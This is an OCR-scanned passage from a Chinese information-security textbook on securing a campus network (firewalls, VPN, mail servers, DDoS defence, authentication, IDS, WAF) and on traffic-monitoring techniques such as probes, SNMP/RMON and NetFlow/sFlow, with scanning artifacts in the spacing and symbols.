要 设置 防火 墙 。 这 些 服务 器 都 需要 被 保护 以 避免 网 络 中 的 其 他 用 户 访问 。 

(3) 在 多 数 情况 下 ， 防 火 墙 不 应 该 与 其 他 的 网 络 设备 ， 比 如 路 由 器 并 行 设置 。 这 样 
可 能 导致 防火 墙 被 旁 路 。 同 时 ， 我 们 也 需要 避免 在 网 络 拓扑 中 加 入 任何 可 能 导致 防火 墙 
被 旁 路 的 设备 。 

随 着 防火 墙 技术 的 发 展 ， 防 火 墙 又 有 了 新 的 特性 可 以 进一步 增强 我 们 的 网 络 安全 ， 
比如 过 滤 SYN 泛 洪 、ICMP 泛 洪 、IP 欺骗 等 网 络 攻击 。 利 用 防火 墙 的 配置 ， 能 够 限制 每 
个 用 户 的 连接 数 甚 至 根据 部 分 应 用 层 服务 特性 阻 断 比如 电驴 、BT 等 P2P 应 用 或 限制 带 
宽 ， 这 为 保证 HITP 之 类 的 应 用 提供 了 重要 安全 保障 和 带宽 保障 。 

4. 虚拟 专用 网 (VPN) 的 设置 

虚拟 专用 网 VPN 综合 了 传统 数据 网 络 的 性 能 优点 和 共享 数据 网 络 结构 的 优点 ， 能 
够 进行 远程 访问 ， 连 接 内 部 网 和 外 部 网 ， 同 时 价格 低廉 。 在 降低 成 本 的 同时 还 能 保证 对 
网 络 带 宽 接 入 和 服务 不 断 增加 的 需求 。 利 用 VPN 特性 在 Internet 上 组 建 世界 范围 的 内 部 
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虚拟 网 。 利 用 Intemet 的 线路 保证 网 络 的 互联 性 ， 利 用 隧道 、 加 密 等 VPN 特性 可 以 保证 
信息 在 整个 内 部 虚拟 网 上 的 安全 传输 。 内 部 虚拟 网 通过 一 个 使 用 专 有 连接 的 共享 基础 设 
施 连接 各 校区 ， 使 它们 拥有 与 专用 网 络 相同 的 服务 ， 包 括 安全 、 服 务 质量 、 可 管理 性 和 
可 靠 性 。 并 且 ， 如 果 使 用 扩展 的 虚拟 专用 网 ， 能 够 很 容易 地 外 部 网 进行 部 署 和 管理 ， 学 
生计 算 机 可 以 通过 学 生 专用 许可 连接 至 校园 网 内 部 ， 通 过 这 种 方式 可 以 有 效 地 对 校园 网 
进行 安全 管理 。 所 以 ， 通 过 VPN 的 方式 不 仅 可 以 连接 学 校 的 各 个 分 校区 ， 同 时 还 可 以 
将 校园 网 的 各 种 服务 延伸 至 校园 外 供 老师 、 学 生 使 用 。 
5. 电子 邮件 服务 器 安全 
电子 邮件 是 校园 网 中 最 难 管理 和 维护 的 系统 之 一 。 随 着 用 户 不 断 增多 ， 邮 件 系统 所 
面临 的 安全 问题 日 益 增 多 ， 例 如 垃圾 邮件 、 中 继 利用 等 。 所 以 校园 网 安全 的 电子 邮件 系 
统 必 须 能 够 有 效 地 消除 垃圾 邮件 、 病 毒 邮 件 、 部 分 网 络 入 侵 。 作 为 一 个 安全 的 电子 邮件 
系统 应 该 具备 以 下 功能 : 系统 本 身 具 有 较 强 的 稳定 性 和 可 靠 性 ; 应 具有 与 防 病毒 系统 集 
成 的 病毒 邮件 查 杀 、 处 理 能 力 ;， 具有 灵活 的 垃圾 邮件 防范 机 制 ， 具 有 严格 的 发 信 认 证 机 
制 和 反 邮 件 中 继 功 能 ， 从 而 避免 本 身 成 为 垃圾 邮件 和 病毒 邮件 的 发 送 源 。 一 个 安全 的 邮 
件 服务 器 一 般 会 具有 邮件 传输 代理 、 邮 件 过 滤器 和 邮件 分 发 代理 。 邮 件 传输 代理 需要 具 
有 较 高 的 健壮 性 ， 即 使 在 重负 荷 之 下 仍然 可 以 工作 。 同 时 还 需要 具有 良好 的 安全 性 ， 最 
好 是 具有 多 层 防御 结构 ， 能 够 有 效 地 抵御 恶意 入 侵 者 。 最 好 是 可 以 运行 在 较 低 的 权限 之 
下 ， 不 可 以 通过 网 络 访问 与 安全 相关 的 本 地 应 用 程序 。 

6. DDoS 防御 

在 校园 网 中 最 常见 的 DDoS 的 攻击 方式 通常 是 利用 系统 的 漏洞 ， 恶 意 占用 大 量 的 
CPU 资源 和 内 存 资源 ， 导 致 受害 主机 系统 服务 性 能 下 降 甚至 造成 系统 瘫痪 。 由 于 DDoS 
攻击 的 复杂 性 ， 很 难 依靠 某 种 单一 的 系统 或 产品 防御 DDoS 的 攻击 。 通 常情 况 下 ， 在 校 
园 网 内 防御 DDoS 攻击 能 力 的 措施 有 以 下 几 种 : 高 性 能 的 硬件 设备 抵抗 DoS 甚至 DDoS 
攻击 ; 充足 的 网 络 带宽 和 系统 优化 ， 安 装 专业 的 抗 DDoS 防火 墙 。 

7. 身份 认证 

如 今 的 数字 化 校园 通常 包括 了 自动 化 办 公 、 财 务 信息 系统 、 教 务 管理 、 图 书馆 系统 、 
电子 邮件 系统 、 就 业 管 理 系统 等 应 用 ， 其 中 都 需要 进行 身份 的 认证 并 且 对 不 同 身份 所 拥 
有 的 角色 进行 授权 ， 而 校园 网 就 常常 需要 面 对 各 种 应 用 系统 在 用 户 管 理 过 程 中 的 分 散 管 
理 的 问题 。 解决 这 个 问题 的 有 效 方法 就 是 采用 统一 、 集 中 管理 用 户 访问 权限 的 认证 系统 。 
通过 建立 一 个 统一 身份 认证 平台 ， 将 校园 网 中 用 户 登录 系统 的 基本 验证 信息 统一 存储 、 
统一 管理 ， 对 应 用 系统 进行 统一 授权 ， 这 样 就 可 以 为 不 同 应 用 系统 提供 用 户 管理 服务 。 
校园 网 统一 身份 认证 系统 ， 将 用 户 信息 资源 统一 保存 到 认证 服务 器 中 ， 保 证 了 信息 资源 
的 稳定 、 可 靠 、 安 全 。 使 用 统一 的 认证 系统 提供 的 接口 连接 服务 ， 系 统 就 可 以 很 好 地 支 
持 基 于 平台 的 各 种 应 用 系统 的 调用 ， 简 单 易 实现 。 同 时 ， 各 应 用 系统 只 需 保留 角色 和 权 
限 控制 ， 用 户 和 角色 的 管理 由 应 用 系统 自行 管理 ， 从 而 简化 了 应 用 系统 中 用 户 管理 模块 


第 6 章 网 络 安全 技术 与 产品 


的 建设 和 后 期 维护 。 

8. 病毒 防范 和 补丁 服务 

在 学 校 网 络 中 心 配置 一 台 高 效 的 服务 器 ， 安 装 一 个 网 络 版 杀毒 软件 系统 中 心 ， 负 责 
管理 校园 网 内 所 有 主机 网 点 的 计算 机 ， 然 后 在 各 主机 结 点 分 别 安 装 网 络 版 杀毒 软件 的 客 
户 端 。 同 时 为 了 安全 和 管理 起 见 ， 管 理 员 需 要 对 网 络 中 心 的 杀毒 软件 进行 定期 的 更 新 。 
而 杀毒 软件 的 选择 目前 在 市 场 上 也 有 很 多 的 产品 。 具 体 选择 什么 样 的 产品 还 需要 根据 学 
校 具体 情况 而 定 。 与 此 同时 ， 还 需要 注意 的 是 封锁 系统 安全 漏洞 。 在 校园 网 的 管理 过 程 
中 ， 要 及 时 下 载 和 安装 各 种 补丁 、 更 新 程序 、 升 级 操作 系统 ， 封 锁 系 统 安全 漏洞 。 这 样 
对 于 保护 网 络 和 信息 系统 的 安全 有 很 大 的 帮助 ， 可 以 有 效 地 防止 一 些 攻击 者 利用 操作 系 
统 或 各 种 应 用 软件 的 漏洞 对 校园 网 资源 进行 非法 访问 和 恶意 自 改 。 

9. IDS 的 设置 

不 同 于 防火 墙 ，IDS 入 侵 检 测 系统 是 一 个 监听 设备 ， 主 要 是 对 流量 进行 基于 网 络 特 
征 、 协 议 分 析 以 及 流量 异常 等 方式 的 检测 ， 并 对 检测 到 的 异常 和 攻击 事件 记录 到 攻击 数 
据 库 中 ， 并 且 可 以 和 其 他 的 交换 机 、 防 火 墙 配合 使 用 进行 整体 防御 。 因 此 ， 一 般 都 是 将 
IDS 部 署 在 关键 流量 流 经 的 链 路 上 。 这 里 的 关键 流量 一 般 指 的 是 ， 来 自 高 危 网 络 区 域 的 
访问 流量 和 需要 进行 监视 的 流量 。 鉴 于 目前 大 部 分 的 网 络 区域 是 交换 式 网 络 结构 ， 所 以 
IDS 在 交换 机 网 络 中 的 位 置 是 选择 以 下 的 地 方 ， 服 务 器 区 域 的 交换 机 上 、Internet 介入 路 
由 器 之 后 的 第 一 台 交 换 机 上 、 重 点 保护 网 段 的 局 域 网 交换 机 上 。 一 个 典型 的 IDS 的 部 署 
方案 如 图 6-4 所 示 。 在 部 署 了 IDS 系统 之 后 ，IDS 能 够 实时 分 析 校 园 网 外 部 以 及 校园 网 
内 部 的 数据 通信 信息 ， 分 辩 入 侵 攻 击 ， 在 校园 网 网 络 系统 收 到 危害 前 以 各 种 方式 发 出 警 
报 ， 并 且 及 时 对 网 络 入 侵 采 取 相 应 措施 ， 最 大 限度 保护 校园 系统 的 安全 。 通 过 多 级 、 分 
布 式 的 网 络 监测 、 管 理 、 控 制 机 制 ，IDS 能 够 有 效 对 校园 网 中 的 关键 资源 进行 控制 和 和 危 
险 预 警 。 

10. WAF 

防火 墙 主要 是 防范 校园 网 外 部 的 攻击 ， 但 是 如 果 要 有 效 地 保证 校园 网 网 站 站 点 的 安 
全 性 ， 就 需要 使 用 到 WAF 技术 。WAF 是 Web Application Firewall 的 简称 ， 中 文 翻译 为 
Web 应 用 防火 墙 。WAEF 是 一 种 网 页 监控 与 恢复 系统 ， 基 于 对 HTTP/HTTPS 流量 的 双向 
分 析 ， 对 网 站 页 面 进行 实时 监控 。 要 在 系统 中 部 署 并 且 利用 好 WAF 需要 进行 一 系列 的 
步骤 和 操作 。 首 先 ， 要 在 校园 网 站 Web 服务 器 启动 监控 端 服务 ， 网 站 这 时 就 会 处 在 网 页 
被 保护 监控 保护 状态 。 其 次 是 网 页 保护 设置 、 监 控 管 理 的 工作 。 在 控制 端 登录 控制 台 ， 
连接 监控 端 主机 进行 设置 ， 进 行 用 户 管理 ， 添 加 或 删除 监控 的 目标 文件 或 目录 ， 设 置 备 
份 服务 器 。 管 理 员 平时 要 注意 日 志文 件 的 观察 。 对 日 志文 件 的 分 析 可 以 即使 发 现 安全 薄 
弱点 和 已 被 入 侵 的 站 点 ， 并 且 完 整 的 网 站 日 志 在 出 现 网 络 安 全 事件 后 可 能 也 是 回溯 追踪 
的 重要 线索 。 
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服务 器 


IDS 检 索引 擎 


图 6-4 IDS 部 署 方案 


综合 考虑 了 以 上 所 分 析 的 网 络 安全 的 标准 、 技 术 、 机 构 以 及 该 校园 网 网 络 建设 的 实 
际 现状 ， 再 加 上 校园 网 网 络 建设 的 网 络 安全 部 署 方案 。 最 终 该 校园 网 的 网 络 拓扑 图 如 图 
6-5 所 示 。 


网 络 中 心 VLAN 


… 其 他 学 院 网 络 


65 改良 后 的 网 络 信息 安全 拓扑 图 


ROR 网 络 安全 技术 与 产品 


通过 以 高 校 校园 网 的 网 络 安全 建设 为 例 ， 从 网 络 安全 所 存在 的 安全 威胁 的 各 个 方面 
对 目前 校园 网 存在 的 安全 威胁 进行 了 分 析 ， 同 时 以 网 络 安全 体系 结构 为 核心 ， 以 网 络 安 
全 的 设计 原则 作为 准则 ， 对 校园 网 进行 了 网 络 安全 的 设计 ， 从 十 个 方面 来 对 校园 网 的 网 
络 安全 进行 了 安全 部 署 。 通 过 目前 的 网 络 安全 设计 ， 能 够 有 效 地 解决 目前 校园 网 所 面临 
的 问题 。 但 是 ， 安 全 防范 体系 的 建立 不 是 一 劳 永 逸 的 ， 校 园 网 络 自身 的 情况 不 断 变化 ， 
新 的 安全 问题 不 断 涌现 ， 必 须根 据 情况 的 变化 和 现 有 体系 中 暴露 出 的 一 些 问题 ， 不 断 地 
对 此 体系 进行 及 时 的 维护 和 更 新 ， 保 证 网 络 安全 体系 的 良性 发 展 ， 确 保 它 的 有 效 性 和 先 
进 性 。 同 时 ， 利 用 漏洞 扫描 其 不 定期 的 检查 整个 网 络 、 主 机 和 服务 的 安全 缺陷 和 安全 漏 
洞 ， 及 时 打 补 丁 ， 更 新 安全 策略 。 


6.2 网络 安全 产品 的 配置 与 使 用 


6.2.1 网 络 流量 监控 和 协议 分 析 


随 着 网 络 技术 的 快速 发 展 ， 信 息 交流 的 形式 也 从 原来 低 带 宽 要 求 的 文件 传输 、 网 页 
新 闻 、 电 子 邮 件 和 论坛 等 升级 到 网 络 图 片 、 语 音 通话 及 视频 会 议 等 大 流量 业务 ， 网 络 从 
文字 时 代步 入 到 多 媒体 时 代 。 与 此 同时 ， 互 联网 所 承载 的 业务 种 类 和 应 用 数量 也 在 不 断 


随 着 电子 商务 、 电 子 支付 、 数 字 货币 、 网 络 银行 等 各 类 新 业务 的 开发 ， 网 络 内 容 安 全 变 
得 越 来 越 严 重 。 基 于 网 络 的 各 种 企业 应 用 迅速 增长 ， 企 业 网 络 规模 随 着 企业 规模 的 扩大 
也 在 不 断 增加 ， 企 业 需 要 对 内 网 和 外 网 进行 严格 约束 。 这 几 个 问题 是 信息 化 社会 迫切 需 
要 解决 的 ， 就 目前 来 看 ， 解 决 这 些 问题 的 最 重要 方案 之 一 就 是 对 网 络 流量 进行 监控 ， 如 
何 设计 高 速 网 络 环境 下 提供 监测 能 力 的 企业 级 流量 监控 系统 是 重要 的 研究 课题 。 

网 络 流量 状况 是 网 络 中 的 重要 信息 , 利用 流量 监测 获得 的 数据 , 可 以 实现 以 下 目标 : 

O 负载 监测 : 将 流量 监测 获得 的 网 络 流量 数据 作为 输入 参数 ， 利 用 统计 方法 和 先 
验 知识 ， 通 过 负载 特性 分 析 过 程 ， 可 以 得 到 网 络 的 当前 负载 状态 。 

© 性 能 分 析 : 利用 流量 信息 ， 可 以 分 析 得 到 网 络 的 性 能 状况 ， 例 如 链 路 利用 率 等 ， 
以 定位 和 防止 网 络 中 的 性 能 瓶颈 ， 提 高 网 络 性 能 。 

@ ` 网 络 纠 错 : 复杂 的 网 络 环境 和 丰富 多 样 的 应 用 类 型 ， 往 往 会 导致 网 络 故障 的 发 
生 。 通 过 分 析 流量 信息 ， 可 以 判定 故障 发 生 的 位 置 和 导致 的 原因 ， 例 如 广播 风暴 、 非 法 
操作 等 ， 并 采取 措施 解决 故障 并 避免 再 次 发 生 。 

@ 网 络 优化 : 流量 工程 的 目的 是 为 了 优化 网 络 性 能 , 其 前 提 是 获取 网 络 中 的 流量 信息 ， 
在 此 基础 上 通过 网 络 控制 ， 例 如 资源 分 配 、 流 量 均衡 等 操作 ， 实 现 网 络 优化 的 目标 。 

© 业务 质量 监视 : 现代 网 络 面临 的 紧迫 任务 是 为 用 户 提供 可 靠 的 业务 质量 保障 。 而 用 
户 获得 的 服务 质量 以 及 网 络 供应 商 可 提供 的 服务 能 力 都 必须 通过 流量 数据 分 析 获 得 。 


EJ 


E 


信息 安全 工程 师 教程 


© 用 户 流量 计 费 : 如 何在 高 速 宽带 网 络 中 实现 基于 流量 的 用 户 计 费 是 目前 网 络 管 
理 领域 的 热点 问题 ， 实 现 高 效 的 流量 计 费 解决 方案 必须 依靠 流量 监测 技术 的 进步 。 

@ 入 侵 检测 : 安全 问题 是 网 络 应 用 中 的 一 个 重要 方面 ， 入 侵 检测 系统 是 目前 保障 
网 络 安全 的 重要 手段 。 入 侵 检 测 的 一 个 重要 内 容 就 是 通过 分 析 网 络 流量 , 判定 攻击 行为 ， 
以 采取 必要 的 防御 措施 。 

@ 协议 调 测 : 在 进行 协议 设计 和 应 用 开发 时 ， 必 须 经 过 实际 网 络 环境 检验 的 过 程 。 
当 新 的 协议 或 应 用 加 入 到 网 络 中 ， 必 须 观测 它们 产生 的 数据 流量 ， 以 判定 协议 或 应 用 的 
操作 是 否 正 常 ， 是 否 会 对 网 络 性 能 造成 损伤 。 
6.2.1.1 网 络 流量 监控 工作 原理 

网 络 流量 是 单位 时 间 内 通过 网 络 设备 或 传输 介质 的 信息 量 ( 报 文 数 、 数 据 包 数 或 字 
节 数 )。 对 在 网 络 中 不 同位 置 通过 不 同方 法 采集 不 同 空间 粒度 和 不 同时 间 粒 度 下 的 网 络 流 
量 ， 并 借助 于 数理 统计 、 随 机 过 程 和 时 间 序 列 等 数学 手段 针对 预先 所 定义 的 一 系列 网 络 
流量 的 相关 属性 对 网 络 流量 展开 分 析 与 研究 , 得 到 网 络 流量 的 不 同属 性 在 其 构成 、 分 布 、 
相关 性 和 变化 规律 与 趋势 等 方面 的 特征 ， 称 为 流量 监测 。 网 络 流量 监控 就 是 通过 分 析 和 
研究 网 络 上 所 运载 的 流量 特性 ， 从 中 抽取 能 够 刻画 网 络 流量 特征 的 参数 ， 进 而 通过 对 网 
络 流量 建 模 模拟 和 性 能 分 析 ， 寻 找 可 调控 的 性 能 参数 ， 对 流量 实施 有 效 的 控制 、 改 进 和 
优化 网 络 性 能 。 

网 络 为 大 多 数 用 户 的 应 用 提供 连通 性 的 媒介 ， 以 TCP/IP 协议 栈 为 基础 和 核心 的 网 
络 遵循 并 实现 了 信息 隐藏 的 原则 , 将 具体 的 用 户 级 的 网 络 应 用 抽象 为 底层 的 数据 帧 / 包 的 
发 送 和 接收 ， 网 络 管理 人 员 通 过 关注 和 研究 数据 包 / 帧 形成 的 网 络 流量 数据 ， 可 以 了 解 整 
个 网 络 的 运行 态势 、 网 络 负载 状况 、 网 络 安全 状况 、 流 量 发 展 趋势 、 用 户 行为 模式 、 业 
务 与 站 点 的 接受 程度 ， 为 网 络 的 运行 和 维护 提供 重要 依据 。 因 此 流量 监控 对 于 网 络 性 能 
分 析 、 异 常 检测 、 链 路 状态 监测 、 容 量规 划 等 发 挥 着 重要 作用 。 

1. 网 络 流量 监控 的 内 容 

流量 监测 中 所 监测 的 流量 通常 采集 自主 机 节点 、 服 务 器 、 路 由 器 的 接口 、 链 路 和 路 
径 等 。 所 监测 流量 的 实体 ， 即 流量 监测 过 程 中 所 需要 关注 的 可 以 量化 表示 的 基本 参数 ， 
主要 包括 : 

CL) 流量 大 小 。 即 在 不 同 的 聚合 层次 上 、 特 定时 间 间 隔 下 采集 得 到 的 比特 数 / 字 节 数 
或 者 是 数据 包 数 所 表示 的 流量 大 小 ,主要 包括 其 在 网 络 正常 负载 或 高 负载 下 的 流量 数值 、 
最 大 值 、 中 值 、 平 均值 、 最 小 值 和 方差 等 。 

(2) 吞吐 量 。 即 单位 时 间 内 的 比特 数 / 字 节 数 或 者 数据 包 数 , 一 般 也 用 流量 速率 表示 。 
根据 监测 目的 的 不 同 ,单位 时 间 的 时 间 粒 度 的 选取 具有 较 宽 的 范围 , 可 以 是 微 秒 、 纳 秒 ， 
也 可 以 是 日 、 周 、 月 或 年 等 。 

(3) 带宽 情况 。 可 描述 网 络 的 使 用 状况 ,其 主要 包括 特定 链 路 或 者 路 径 的 容量 带宽 、 
可 用 带宽 等 。 
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C4) 时 间 计 数 。 指 的 是 网 络 流量 在 时 间 结 构 上 的 属性 ， 通 过 时 间 来 刻画 网 络 流量 的 
动态 变化 情况 ， 主 要 包括 流量 速率 的 高 峰 、 低 谷 、 突 发 和 拌 动 等 所 出 现 的 时 刻 ， 并 发 连 
接 / 会 话 /应 用 的 高 峰 、 低 谷 、 突 发 和 抖动 等 所 出 现 的 时 刻 ; 数据 包 到 达 的 时 间 间 隔 、 特 
定 协 议 完成 特定 功能 的 数据 包 , 例如 ，ICMP (Internet Control Messages Protocol, ICMP) 
的 主机 不 可 达 和 网 络 不 可 达 、TCP (Transmission Control Protocol, TCP) 的 SYN 包 和 
RST 包 ， 等 等 。 到 达 的 间隔 、 流 到 达 的 时 间 间 隔 、 会 话 /会 话 建立 的 时 间 间 隔 ; 流 的 持续 
时 间 、 会 话 /应 用 的 持续 时 间 和 MPLS (Multiple Protocol Label Switching, MPLS) 路 径 
的 持续 时 间 等 等 。 

(5) 延迟 情况 。 主 要 包括 数据 包 通过 路 由 器 时 的 排队 延迟 、 节 点 对 之 间 的 单 向 延迟 、 
往返 延迟 、 延 迟 变 化 等 。 

(6) 流量 故障 。 指 的 是 流量 本 身 中 的 意外 和 错误 ， 主 要 包括 错误 数据 包 封 装 、 数 据 
包 重 传 和 数据 包 丢 包 等 的 比例 、 速 率 和 突 发 模式 等 。 

2. 网 络 流量 监控 技术 

网 络 流量 监测 技术 主要 包括 : 基于 数据 采集 探 针 的 流量 监控 技术 、 基 于 SNMP 
(Simple Network Management Protocol, SNMP) /RMON (Remote Network Monitoring, 
RMON) 的 流量 监控 技术 、 基 于 Netflow/sFlow 的 流量 监控 技术 以 及 基于 实时 抓 包 的 流 
量 监控 技术 等 这 3 种 常用 技术 。 

A) 基于 数据 采集 控 针 的 监控 技术 

数据 采集 探 针 是 专门 用 于 获取 网 络 链 路 流量 数据 的 硬件 设备 。 按 实现 方式 可 以 分 为 
软件 架构 和 硬件 架构 。 使 用 时 是 通过 交换 机 流量 镜像 端口 或 直接 将 其 串 接 在 待 观测 的 链 
路 上 ， 对 链 路 上 所 有 的 数据 报 文 进行 处 理 ， 提 取 流 量 监测 所 需 的 协议 字段 甚至 全 部 报 文 
内 容 。 

流量 探 针 可 以 实时 对 流量 数据 进行 采集 记录 ， 经 过 汇聚 和 预 处 理 将 流量 信息 发 送 到 
后 端 数据 库 。 通 过 分 析 软 件 可 进行 实时 监视 ， 图 表 显 示 分 析 统 计 结 果 或 导出 报表 文件 ， 
通过 条 件 设置 还 能 够 利用 流量 探 针 的 数据 捕获 功能 对 网 络 流量 进行 实时 采集 或 流量 镜 
像 ， 进 行 报 文 的 协议 分 析 。 

硬件 架构 的 数据 采集 探 针 是 为 流量 监测 目的 专门 设计 的 技术 方案 ， 能 够 做 到 高 速 端 
口 的 限 速 流量 采集 , 提供 对 GE 甚至 2.5G POS 链 路 的 支持 。 探 针 采 用 无 源 分 光 器 或 镜像 
方式 接 入 网 络 ， 不 影响 原 有 设备 的 传输 和 性 能 。 流 量 采集 过 程 不 需要 现 有 网 络 设备 的 参 
与 , 路 由 器 交换 机 可 全 力 用 于 路 由 和 转发 。 探 针 技 术 不 依赖 于 设备 本 身 的 流量 统计 功能 ， 
就 能 够 精确 记录 所 有 报 文 的 流量 信息 , 还 可 根据 用 户 要 求 定制 灵活 高 效 的 数据 采集 策略 ， 
最 终 满足 用 户 对 流量 监测 的 需求 。 

流量 探 针 的 安装 很 简单 ， 可 以 用 于 高 速 的 网 络 而 不 影响 网 络 性 能 ， 适 合 部 署 在 汇聚 
层 、 骨 干 层 或 某 些 网 间 互 连 的 重要 或 关键 链 路 上 。 如 果 价 格 合理 也 可 以 部 署 在 接 入 层 到 
汇聚 层 的 边缘 。 由 于 探 针 必 须 放 置 在 物理 链 路 上 ， 因 此 不 同类 型 的 端口 需要 不 同 接口 的 
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探 针 ， 目 前 主要 有 FE, GE, OC-3 POS/ATM, 2.5G POS 等 。 探 针 方法 需要 部 署 新 的 设 
备 ， 并 且 一 个 探 针 同 时 只 能 监测 一 条 或 几 条 链 路 的 流量 信息 。 对 于 全 网 流量 的 监测 需要 
采用 分 布 式 方案 ， 在 每 条 链 路 部 署 一 个 探 针 ， 再 通过 后 台 服 务 器 和 数据 库 ， 收 集 所 有 探 
针 的 数据 ， 做 全 网 的 流量 分 析 和 长 期 报告 。 与 其 他 的 3 种 方式 相 比 ， 基 于 硬件 探 针 的 最 
大 特点 是 能 够 提供 丰富 的 从 物理 层 到 应 用 层 的 详细 信息 。 但 是 硬件 探 针 的 监测 方式 受 限 
于 探 针 的 接口 速率 ， 一 般 只 针对 1000Mb 以 下 的 速率 ， 而 且 探 针 方式 重点 是 单条 链 路 的 

(2) 基于 SNMPARMON 的 流量 监控 技术 

SNMP (Simple Network Management Protocol, SNMP) 是 TCP/IP 的 标准 网 络 管理 
协议 。 基 于 SNMP 的 流量 信息 采集 ， 实 质 上 是 测试 仪表 通过 提取 网 络 设备 代理 提供 的 
MIB (Management Information Base, MIB) 收集 一 些 具体 设备 及 流量 信息 有 关 的 变量 。 
MIB 定义 了 节点 设备 的 对 象 标识 树 ， 每 个 对 象 表示 设备 的 一 种 状态 或 数据 (如 接口 发 送 、 
接收 的 报 文 数 和 字 节 数 )。 基 于 SNMP 收集 的 网 络 流量 信息 包括 : 输入 字 节 数 、 输 入 非 
广播 包 数 、 输 入 广播 包 数 、 输 入 包 丢 弃 数 、 输 入 包 错 误 数 、 输 入 未 知 协议 包 数 、 输 出 字 
节 数 、 输 出 非 广播 包 数 、 输 出 广播 包 数 、 输 出 包 丢 弃 数 、 输 出 包 错 误 数 、 输 出 队长 等 。 

RMON 协议 是 对 SNMP 标准 的 扩展 ， 它 定义 了 远程 监视 的 标准 功能 以 及 远程 监控 
代理 的 接口 ， 主 要 对 一 个 网 段 乃 至 整个 网 络 的 性 能 数据 进行 采集 和 测量 ,RMON 关注 网 
络 链 路 层 的 统计 、 分 析 和 告警 ， 而 RMON 关注 网 络 层 和 应 用 层 的 性 能 监测 ， 在 RMON 
基础 上 增加 了 协议 分 布 和 探 针 配置 等 项 目 。RMON 通过 两 种 方法 收集 数据 : 一 种 是 将 
RMON 代理 嵌入 网 络 设备 使 其 对 外 提供 RMON 功能 ; 另 一 种 是 通过 专用 的 RMON 探 针 ， 
网 管 直 接 从 探 针 获取 信息 并 控制 网 络 设备 。 

(3) 基于 NetFlow/sFlow 的 流量 监控 技术 

NetFlow 流量 信息 采集 是 基于 Cisco 提供 的 NetFlow 机 制 实现 的 网 络 流量 信息 采集 。 
NetFlow 为 Cisco 之 专属 协议 ， 已 经 标准 化 ， 并 且 Juniper、Extreme、 华 为 等 厂家 也 逐渐 
支持 ，NetFlow 由 路 由 器 、 交 换 机 自身 对 网 络 流量 进行 统计 ， 并 且 把 结果 发 送 到 第 三 方 
流量 报告 生成 器 和 长 期 数据 库 。 一 旦 收集 到 路 由 器 、 交 换 机 上 的 详细 流量 数据 后 ， 便 可 
为 网 络 流量 统计 、 网 络 使 用 量 计 价 、 网 络 规划 、 病 毒 流 量 分 析 ， 网 络 监测 等 应 用 提供 技 
术 依 据 。 同 时 ，NetFlow 也 提供 针对 QoS (Quality of Service, QoS) 的 监测 基准 ， 能 够 
捕捉 到 每 一 个 数据 流 的 流量 分 类 或 优先 性 特性 ， 而 能 够 进一步 根据 QoS 进行 分 级 收费 。 

NetFlow 是 Cisco 公司 提出 的 网 络 数据 包 交 换 技术 ， 它 同时 可 用 来 记录 网 络 流 信息 。 
一 个 网 络 流 是 从 给 定 的 源 到 目的 端的 单 向 的 一 系列 数据 包 ， 它 使 用 源 和 目的 端点 的 IP 
(Internet Protocol, IP) 地 址 和 传输 层 端口 号 、 协 议 类 型 、 服 务 类 型 (Type of Service, ToS) 
以 及 输入 接口 等 来 标记 网 络 流 。 

NetFlow 采用 三 层 体系 结构 (数据 输出 设备 、 数 据 收集 器 和 数据 分 析 器 ) 完 成 流 数据 信 
息 从 采集 、 汇 聚 、 输 出 、 接 收 、 过 滤 、 存 储 到 分 析 的 过 程 。 一 般 NetFlow 采用 集中 的 工 
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作 站 或 服务 器 同时 收集 多 个 路 由 设备 的 上 报 数据 。NetFlow 的 数据 输出 要 求 先 在 路 由 器 
和 交换 机 上 定制 NetFlow 流 输出 ， 并 选择 输出 流 的 版 本 、 个 数 、 缓 冲 区 的 大 小 等 ， 配 置 
相应 流量 收集 器 的 中 地 址 、 端 口 等 信息 ,此 时 路 由 器 或 交换 机 即 可 以 UDPCUser Datagram 
Protocol, UDP) 的 方式 向 外 发 送 流 信息 ， 然 后 在 NetFlow FlowCollector 端 ， 配 置 接收 端 
口号 、 设 置 汇聚 、 过 滤 策 略 、 流 量 文件 存放 目录 、 格 式 等 等 。 一 般 来 说 ，NetFlow 
FlowCollector 都 选用 UNIX 工作 站 来 收集 数据 ，NetFlow FlowCollector 收集 的 数据 将 存 
放 在 本 地 磁盘 中 。 同时, 它 也 可 以 通过 网 关 以 SOCKET 方式 发 送信 息 到 其 他 网 管 分 析 软 
件 , 如 Cisco 公司 的 NetFlow FlowAnalyzer 流量 分 析 软 件 。 也 可 以 直接 读 取 存放 NetFlow 
FlowCollector 工作 站 中 的 数据 文件 ， 对 其 进行 分 析 处 理 。 例 如 将 这 些 数 据 应 用 到 网 络 仿 
真 中 ， 仿 真 出 实际 网 络 运行 的 性 能 参数 ， 为 网 络 设计 和 规划 、 运 营 维护 等 领域 服务 。 

与 其 他 的 方式 相 比 , 基于 NetFlow 的 流量 监测 技术 属于 中 央 部 署 级 方案 , 部 署 简单 、 
升级 方便 ， 重 点 是 全 网 流量 的 采集 ， 而 不 是 某 条 具体 链 路 。NetFlow 流量 信息 采集 效率 
高 ， 网 络 规模 越 大 ， 成 本 越 低 ， 拥 有 很 好 的 性 价 比 和 投资 回报 ， 但 开启 NetFlow 功能 需 
要 占用 路 由 器 的 CPU 存储 资源 ,对 设备 的 转发 性 能 有 较 大 影响 , 特别 是 对 汇聚 层 、 骨 干 
层 的 GE 或 2.5G POS 接口 的 影响 尤为 明显 ,而且 基 于 连接 上 报 的 流 数据 量 很 大 , 给 传输 、 
处 理 和 存储 造成 极 大 困难 。 目 前 一 般 采 用 抽样 技术 ,针对 不 同 的 应 用 采用 100-1000 的 抽 
样 比 ， 但 势必 损失 流量 的 许多 细节 。 

sFlow 也 是 一 种 嵌入 在 路 由 器 或 交换 机 内 的 基于 抽样 的 流量 监测 技术 。sFlow 的 目标 
是 为 了 实现 高 速 网 络 中 多 设备 、 多 端口 的 基于 应 用 的 流量 监测 。sFlow 代理 软件 采用 数 
据 采 样机 制 ， 将 抽样 流 的 流量 信息 以 sFlow 报 文 格式 发 送 给 流量 收集 器 进行 流量 分 析 ， 
同时 支持 大 量 的 sFlow 代理 。 

(4) 基于 实时 抓 包 的 流量 监控 技术 

基于 实时 抓 包 的 流量 监控 技术 提供 详细 的 从 物理 层 到 应 用 层 的 数据 分 析 。 但 该 方法 
主要 侧重 于 协议 分 析 ， 而 非 用 户 流量 访问 统计 和 趋势 分 析 ， 仅 能 在 短 时 间 内 对 流 经 接口 
